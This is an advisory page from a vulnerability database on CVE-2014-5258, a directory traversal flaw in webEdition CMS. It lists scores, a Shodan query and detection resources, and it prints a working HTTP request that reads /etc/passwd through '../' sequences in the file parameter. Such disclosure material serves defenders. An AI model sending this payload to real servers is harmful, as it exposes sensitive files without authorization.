🔙 목록으로 돌아가기

CVE-2014-5258: webEdition 6.3.8.0 - Directory Traversal

TitlewebEdition 6.3.8.0 - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability.
CVSS Score4
EPSS Score0.81937
CVE IDCVE-2014-5258
CWE IDCWE-22
Shodan Querycpe:"cpe:2.3:a:webedition:webedition_cms"
Tags cve2014 cve edb packetstorm lfi webedition vuln

🔍 Vulnerability Description

A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.

🌐 HTTP Request

GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.2
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-5258.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-5258.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A